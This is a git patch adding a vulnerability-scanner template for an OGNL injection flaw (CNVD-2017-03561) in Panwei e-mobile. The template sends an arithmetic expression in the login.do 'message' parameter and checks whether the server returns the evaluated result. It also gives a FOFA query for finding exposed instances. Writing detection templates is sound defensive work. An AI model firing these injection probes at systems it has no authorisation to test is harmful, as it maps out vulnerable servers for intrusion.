From 753d4cf839b4481cfd18005c1007ae863f57bc54 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 12 Aug 2022 00:35:26 +0530
Subject: [PATCH] Create CNVD-2017-03561.yaml

---
 cnvd/2017/CNVD-2017-03561.yaml | 34 ++++++++++++++++++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 cnvd/2017/CNVD-2017-03561.yaml

diff --git a/cnvd/2017/CNVD-2017-03561.yaml b/cnvd/2017/CNVD-2017-03561.yaml
new file mode 100644
index 0000000000..efd58260a4
--- /dev/null
+++ b/cnvd/2017/CNVD-2017-03561.yaml
@@ -0,0 +1,34 @@
+id: CNVD-2017-03561
+
+info:
+  name: Panwei e-mobile - Ognl Injection
+  author: ritikchaddha
+  severity: high
+  reference:
+    - https://gitee.com/cute-guy/Penetration_Testing_POC/blob/master/%E6%B3%9B%E5%BE%AEe-mobile%20ognl%E6%B3%A8%E5%85%A5.md
+  metadata:
+    verified: true
+    fofa-query: app="泛微-eMobile"
+  tags: cnvd,cnvd2017,emobile,ognl,panwei
+
+variables:
+  num1: "9999"
+  num2: "5555"
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login.do?message={{num1}}*{{num2}}"
+      - "{{BaseURL}}/login/login.do?message={{num1}}*{{num2}}"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '55544445'
+
+      - type: status
+        status:
+          - 200